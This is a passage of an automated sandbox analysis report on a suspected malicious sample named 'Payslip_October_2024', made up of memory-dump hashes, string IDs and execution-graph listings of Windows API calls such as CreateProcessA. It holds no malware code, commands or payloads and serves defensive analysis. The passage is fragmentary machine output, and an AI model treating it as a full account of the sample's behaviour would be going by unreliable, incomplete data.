                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f78f14b7684c750004954be440a77b621e9038d34cf2293227d0ff33bc7c370
                                                                                                            • Instruction ID: 627b2b08a79cd4d0132b512cf68b6fc59d492e162f466757084988c25c3ad51b
                                                                                                            • Opcode Fuzzy Hash: 0f78f14b7684c750004954be440a77b621e9038d34cf2293227d0ff33bc7c370
                                                                                                            • Instruction Fuzzy Hash: 4011A132F106265FDF949668CC68AAF73EAEBC8314F004139D50AE7344DE25DC428BD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a08a25b6ec037d62e849286ea59e7073f3ff4afe5791f38ccac7616824a1e770
                                                                                                            • Instruction ID: 05cb7a43516b55e26399d6b2f9dd1922c4e95e5f287983c85a587fdfdb3f5822
                                                                                                            • Opcode Fuzzy Hash: a08a25b6ec037d62e849286ea59e7073f3ff4afe5791f38ccac7616824a1e770
                                                                                                            • Instruction Fuzzy Hash: 6D11EF707003148FD315AF29D45469BB7E6FB85759B20897DD11A8B388DF32AC06CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3bcccd8f188b92c434772dbe10ec77f0989a0b3e4f2d17523aa228010e75d6eb
                                                                                                            • Instruction ID: a90b9bae8332d63b4cfd75d4af0d79da825e9729d37be967dae79afdf6ea1493
                                                                                                            • Opcode Fuzzy Hash: 3bcccd8f188b92c434772dbe10ec77f0989a0b3e4f2d17523aa228010e75d6eb
                                                                                                            • Instruction Fuzzy Hash: CC2103B58003499FDB10DF9AC984ADEBBF4FB49324F10842AE959A3311C378A945CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee4cbc72f176fba362f64dfdfdbddfefc45599f1cec540eef8df974b13d7798e
                                                                                                            • Instruction ID: c97c5d4df590bdddb8d3ab6a3a900ac38d985a8bb306334b50c019878b80197e
                                                                                                            • Opcode Fuzzy Hash: ee4cbc72f176fba362f64dfdfdbddfefc45599f1cec540eef8df974b13d7798e
                                                                                                            • Instruction Fuzzy Hash: 472133B58003499FDB10DF9AC984ADEBBF8FB49310F10801AE958A3301C374A955CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4e03de9a84aa773c69660e8ccdf47cd07f3005c505885a11b02e590eea60644
                                                                                                            • Instruction ID: 682dc245f93a8c997ad8ac49602eada7336e8366ec9800e5dcfa2f80b4730b93
                                                                                                            • Opcode Fuzzy Hash: a4e03de9a84aa773c69660e8ccdf47cd07f3005c505885a11b02e590eea60644
                                                                                                            • Instruction Fuzzy Hash: 4901F131B015610BCB6292B9D854B6E7BEADBCA610B28847BE00AC7342E920DC0347C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c3d78d57364aee56747ff33b1938f042ffd0cb5e982c01c596be9cb85e04c51
                                                                                                            • Instruction ID: 014dad4150b12e526fe7b4570ea7fe7a6b50f65c42232ea3eb352f68c5f3e17b
                                                                                                            • Opcode Fuzzy Hash: 0c3d78d57364aee56747ff33b1938f042ffd0cb5e982c01c596be9cb85e04c51
                                                                                                            • Instruction Fuzzy Hash: 1A01DF32B105211BDB64956EE81076FB6DAEBC9711F28883AF10EC7741EE65DC028795
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a5678e829b3d05fbc3db49de310feecfaf07eb821642f2c72e978af1ae0eeeaf
                                                                                                            • Instruction ID: dfe2ae5928c80922977ed72c02b7cfba29f643874b307a40e31b85e36c831c21
                                                                                                            • Opcode Fuzzy Hash: a5678e829b3d05fbc3db49de310feecfaf07eb821642f2c72e978af1ae0eeeaf
                                                                                                            • Instruction Fuzzy Hash: B6F0C075E00714AF8B34DFA9D80489EBBF9FF49710B40896EE95593600D771E918CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 002bbde3785d1ac6011f51103f8ce6c5139cf11e5139b01e8802e44f23b2ca9d
                                                                                                            • Instruction ID: a0987bd787ca236de8fb2f2045e8d645a973b97709c7a63fe52ad8f048d490af
                                                                                                            • Opcode Fuzzy Hash: 002bbde3785d1ac6011f51103f8ce6c5139cf11e5139b01e8802e44f23b2ca9d
                                                                                                            • Instruction Fuzzy Hash: FDF0EDF1906209EFC700EBB0E95258C7FB2EB80308710469AE80AC3A06EA351E169B51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86ef6f1ddaaee19f7ab9c869cc0ed6975f9360878b1c2c3743c67d05ac0be5ad
                                                                                                            • Instruction ID: 3f77fced4576ef6735096bff4ed3e25be5592edc6cff3d02756823901b86071d
                                                                                                            • Opcode Fuzzy Hash: 86ef6f1ddaaee19f7ab9c869cc0ed6975f9360878b1c2c3743c67d05ac0be5ad
                                                                                                            • Instruction Fuzzy Hash: 1CE0D8B1D155155FDF50CFB0CA1939A77A4AB42304F2088E6C804DB24AE136CE028B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 575895b6da206bc8a9ff0a4b945ef170d469cf35208457fe518a93aa27d96846
                                                                                                            • Instruction ID: 01b79f427ca9a94fb3e8e74e15f9cf190579a8032240c5ccf7eb43fea71225ff
                                                                                                            • Opcode Fuzzy Hash: 575895b6da206bc8a9ff0a4b945ef170d469cf35208457fe518a93aa27d96846
                                                                                                            • Instruction Fuzzy Hash: 78D023522992900BD70763B43C520EC7F4CCF43134B0640A7C14C87243CC404D1343C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 077cae1c524ba612ec171ac4c5e12f383a5690a3a4052af37dfac3db7e05be93
                                                                                                            • Instruction ID: 3e33e7d7888a4687435d0a7cf0d1bd3bbd175d7cb8c63cf80979d5f6151d2f1f
                                                                                                            • Opcode Fuzzy Hash: 077cae1c524ba612ec171ac4c5e12f383a5690a3a4052af37dfac3db7e05be93
                                                                                                            • Instruction Fuzzy Hash: 20E04FB0901219EFC700EFA4E65145C7BF5FB44305B104695E806D3704EA312E109B51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 389e6a432a9304965d7c23b982a61661f80998afe0e72d737ee99781993eb251
                                                                                                            • Instruction ID: 9af2f382fe855d8ee0b5cd23c6e2ddf13f8f4baf6f07413acdb78507750a4584
                                                                                                            • Opcode Fuzzy Hash: 389e6a432a9304965d7c23b982a61661f80998afe0e72d737ee99781993eb251
                                                                                                            • Instruction Fuzzy Hash: 56D0923210021DBB8F01AE85EC01DDB3B2AEF897A0B148115FE1417221C672ED72EBE0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8138ff074bde4d4a1f9fa436c508952db0abea2bbcccc8e554cfba1d154d11c0
                                                                                                            • Instruction ID: d8b820ec5027c050379cfff171647d3f3bf3aa083fd2d66b47199e5f73571fbd
                                                                                                            • Opcode Fuzzy Hash: 8138ff074bde4d4a1f9fa436c508952db0abea2bbcccc8e554cfba1d154d11c0
                                                                                                            • Instruction Fuzzy Hash: 82B09B2175413513DA08719D68105FD768D87C6569F000067D50D977418CC59C4206DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 00c8ce819f82b47c44c9e6ee6d4e45b3c890e53d64a1846a492ef54ae1cfc0e1
                                                                                                            • Instruction ID: 6263ee445201527edbeae3952382a56740deeb112707b4240b9e114e71a973bf
                                                                                                            • Opcode Fuzzy Hash: 00c8ce819f82b47c44c9e6ee6d4e45b3c890e53d64a1846a492ef54ae1cfc0e1
                                                                                                            • Instruction Fuzzy Hash: CDC08C30700A208B8B21AF26A9140ECB3B0BB4A660300090AE09A83640CB26EA0287C4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28055e46df8fc0693f1a8db027fde8ddb206961f27274c2ac5149e1c7faf4707
                                                                                                            • Instruction ID: 0254700a7e931c447e1f6f1aebbcd63ebde37bec38599c18ec1a5c8729832447
                                                                                                            • Opcode Fuzzy Hash: 28055e46df8fc0693f1a8db027fde8ddb206961f27274c2ac5149e1c7faf4707
                                                                                                            • Instruction Fuzzy Hash: DCD0927494421ACBEB209F92C82CBEEBB70BB05315F214459D541A6190CBBD1546CF95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c21d213c9165ae76d49fd3c63fb108ae724792357349eeaebb634f5e9ffdea12
                                                                                                            • Instruction ID: 4222cd9d4550cb62c28293040772ea2291ea4d380e3b521f61bcd186ead2e81b
                                                                                                            • Opcode Fuzzy Hash: c21d213c9165ae76d49fd3c63fb108ae724792357349eeaebb634f5e9ffdea12
                                                                                                            • Instruction Fuzzy Hash: 18C012B04502008ADF189F1898481113F90EB92329B301A8D9058491C1D772D943D7C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2287772bc6c92d15fff9c5f95b3718fb8453e5d1cca9132dbd8a5f5e29b5394f
                                                                                                            • Instruction ID: e3b1fbdac4e722e77261b8f7111c4a90f0e8f0945445c8d549c7f2673cf82b05
                                                                                                            • Opcode Fuzzy Hash: 2287772bc6c92d15fff9c5f95b3718fb8453e5d1cca9132dbd8a5f5e29b5394f
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: 286612679a87b9958126d8c9f632e64d218967518d295db2758d8807aa44bd34
                                                                                                            • Instruction ID: a8c688482b043e7c0baf81ea73a352e87547c77f14cde5f2dd9146e6211f83a8
                                                                                                            • Opcode Fuzzy Hash: 286612679a87b9958126d8c9f632e64d218967518d295db2758d8807aa44bd34
                                                                                                            • Instruction Fuzzy Hash: D7120D30E0062ACFDB64DF65C854AADBBF2BF89305F208969D40AAB355DB309D45CF91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 05004e10cbf2b0b2dceb7179af450ea11c4382a99b9786de437bb4909c38ba8a
                                                                                                            • Instruction ID: 9052d200ca86985b548e9a26043db36005a68710e5add15e723ec9cd931f4530
                                                                                                            • Opcode Fuzzy Hash: 05004e10cbf2b0b2dceb7179af450ea11c4382a99b9786de437bb4909c38ba8a
                                                                                                            • Instruction Fuzzy Hash: B9918E70E0061ADFDB68EFA4D954BAEB7F2AF84701F108829E4059B355DBB49C45CF90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: c1fe8f0c3cfe49f07e61d4718175de4d3be6d83ca8d29ad0621eaa7426b0fd49
                                                                                                            • Instruction ID: 32890d3b3dd528c667cecd5970da9eca70630e9c015ef8630d494cd9764583b3
                                                                                                            • Opcode Fuzzy Hash: c1fe8f0c3cfe49f07e61d4718175de4d3be6d83ca8d29ad0621eaa7426b0fd49
                                                                                                            • Instruction Fuzzy Hash: 9CF14C30A01219CFDB58EF65D494B6EBBB2FF84305F248569D40A9B359DB35AC82CF81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 38c06a2a903016e8f7fd9feff2aa463ed4c59e1778d2294dab567e8163019128
                                                                                                            • Instruction ID: 03288607d741aa1e202a150ae4b828befa1eb31e357e0fac300719f43eebc479
                                                                                                            • Opcode Fuzzy Hash: 38c06a2a903016e8f7fd9feff2aa463ed4c59e1778d2294dab567e8163019128
                                                                                                            • Instruction Fuzzy Hash: BDB13A30E106299BDB54EB68D89466EB7F2FF84301F24C829D40ADB355DB74EC86CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            • Opcode ID: e6e61f1c3a29db435be8e29d339b186fcf0c44ff778b0ebf1a0b53293327623a
                                                                                                            • Instruction ID: 1f361e4225013240ab8ca7ee43696c36c87ddc34b4c179e6b7afc3b7368acce1
                                                                                                            • Opcode Fuzzy Hash: e6e61f1c3a29db435be8e29d339b186fcf0c44ff778b0ebf1a0b53293327623a
                                                                                                            • Instruction Fuzzy Hash: 6551C130B006168FDB58EB28C954B6AB7E6FF88305F14896DE4069F395EA30EC55CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: a6c0b5b5403f7f431d73ddecd98bff5970877a3cfb745d63c1b7bc8f9ee79b55
                                                                                                            • Instruction ID: ac5591e3798bd7cc0816ac0f801c09f2747fbe452ddab3d022192a2383622e93
                                                                                                            • Opcode Fuzzy Hash: a6c0b5b5403f7f431d73ddecd98bff5970877a3cfb745d63c1b7bc8f9ee79b55
                                                                                                            • Instruction Fuzzy Hash: C751B270E10616CFCF65EBA4D58466EB3B2EB84301F14892AE40ADB345DB74DC42CF81

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:196
                                                                                                            Total number of Limit Nodes:15

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 705 b7e2e0-b7e36f GetCurrentProcess 709 b7e371-b7e377 705->709 710 b7e378-b7e3ac GetCurrentThread 705->710 709->710 711 b7e3b5-b7e3e9 GetCurrentProcess 710->711 712 b7e3ae-b7e3b4 710->712 714 b7e3f2-b7e40a 711->714 715 b7e3eb-b7e3f1 711->715 712->711 717 b7e413-b7e442 GetCurrentThreadId 714->717 715->714 719 b7e444-b7e44a 717->719 720 b7e44b-b7e4ad 717->720 719->720
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7E35E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00B7E39B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7E3D8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00B7E431
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 63e1cbbb787122f8ba45aad8c54775fc9b789c4191c2bacf2174e7721806798a
                                                                                                            • Instruction ID: 1220e3bcec9bd9363ceb576335ce859427d5202677971c4c90392de7cd731961
                                                                                                            • Opcode Fuzzy Hash: 63e1cbbb787122f8ba45aad8c54775fc9b789c4191c2bacf2174e7721806798a
                                                                                                            • Instruction Fuzzy Hash: 285136B09003098FDB14DFAAD548B9EBBF1EF88314F21C599E429A7390D774A944CB66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070136FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: d77a49a19e5191dd75fdf37818e1895b64a9c8bb21878df7a92f829cfd558ca6
                                                                                                            • Instruction ID: e2a739990959dab474b8622a83bd6f1d0d194f4f8bb2b28f2fbed24c37338473
                                                                                                            • Opcode Fuzzy Hash: d77a49a19e5191dd75fdf37818e1895b64a9c8bb21878df7a92f829cfd558ca6
                                                                                                            • Instruction Fuzzy Hash: 88A139B1D0021A9FDB24CF68C8417DEFBF2BF48314F1486A9E819A7240DB749985CF92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070136FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 96a1c3fb2a88e6ec8372cd85ec26293e4dcf4ddcc6deb46be9cfe726e790267c
                                                                                                            • Instruction ID: dfcb59b8529c1e59f2c367c716eee0204d95ec6ffcd9c1348c9204654fd137f4
                                                                                                            • Opcode Fuzzy Hash: 96a1c3fb2a88e6ec8372cd85ec26293e4dcf4ddcc6deb46be9cfe726e790267c
                                                                                                            • Instruction Fuzzy Hash: 849139B1D0021A9FDB24CF68C8417DDFBF2BF49314F1486A9E819A7240DB759985CF92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1092 b75a7c-b75b0c
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ec133e627cf2b8fa549abb960293f623d0a8c7cc4b71b32e6bc110b899338c7
                                                                                                            • Instruction ID: a86248a84b02799a26ca57ba2a79cc314b90982c416e10e3f2cef110afd4f8ee
                                                                                                            • Opcode Fuzzy Hash: 4ec133e627cf2b8fa549abb960293f623d0a8c7cc4b71b32e6bc110b899338c7
                                                                                                            • Instruction Fuzzy Hash: 14319CB1804B88CFDF21DFA8C8857DEBBF0EF55324F208299C5696B251C7B1A949CB41

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1095 b744e4-b759d1 CreateActCtxA 1099 b759d3-b759d9 1095->1099 1100 b759da-b75a34 1095->1100 1099->1100 1107 b75a36-b75a39 1100->1107 1108 b75a43-b75a47 1100->1108 1107->1108 1109 b75a49-b75a55 1108->1109 1110 b75a58 1108->1110 1109->1110 1112 b75a59 1110->1112 1112->1112
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B759C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 94c4a8737e46133cc0a1538862f48333b7f309892ad77a26f98c7cbac36bb073
                                                                                                            • Instruction ID: 1db9e793ed363caf75199b2d100c358559064f34933740b91207750c3e3d96ba
                                                                                                            • Opcode Fuzzy Hash: 94c4a8737e46133cc0a1538862f48333b7f309892ad77a26f98c7cbac36bb073
                                                                                                            • Instruction Fuzzy Hash: 0D41D1B0C0071DCBDB24DFA9C884B9EBBF5BF48314F24816AD419AB251DBB56949CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1113 b7590d-b75984 1115 b75987-b759d1 CreateActCtxA 1113->1115 1117 b759d3-b759d9 1115->1117 1118 b759da-b75a34 1115->1118 1117->1118 1125 b75a36-b75a39 1118->1125 1126 b75a43-b75a47 1118->1126 1125->1126 1127 b75a49-b75a55 1126->1127 1128 b75a58 1126->1128 1127->1128 1130 b75a59 1128->1130 1130->1130
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B759C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
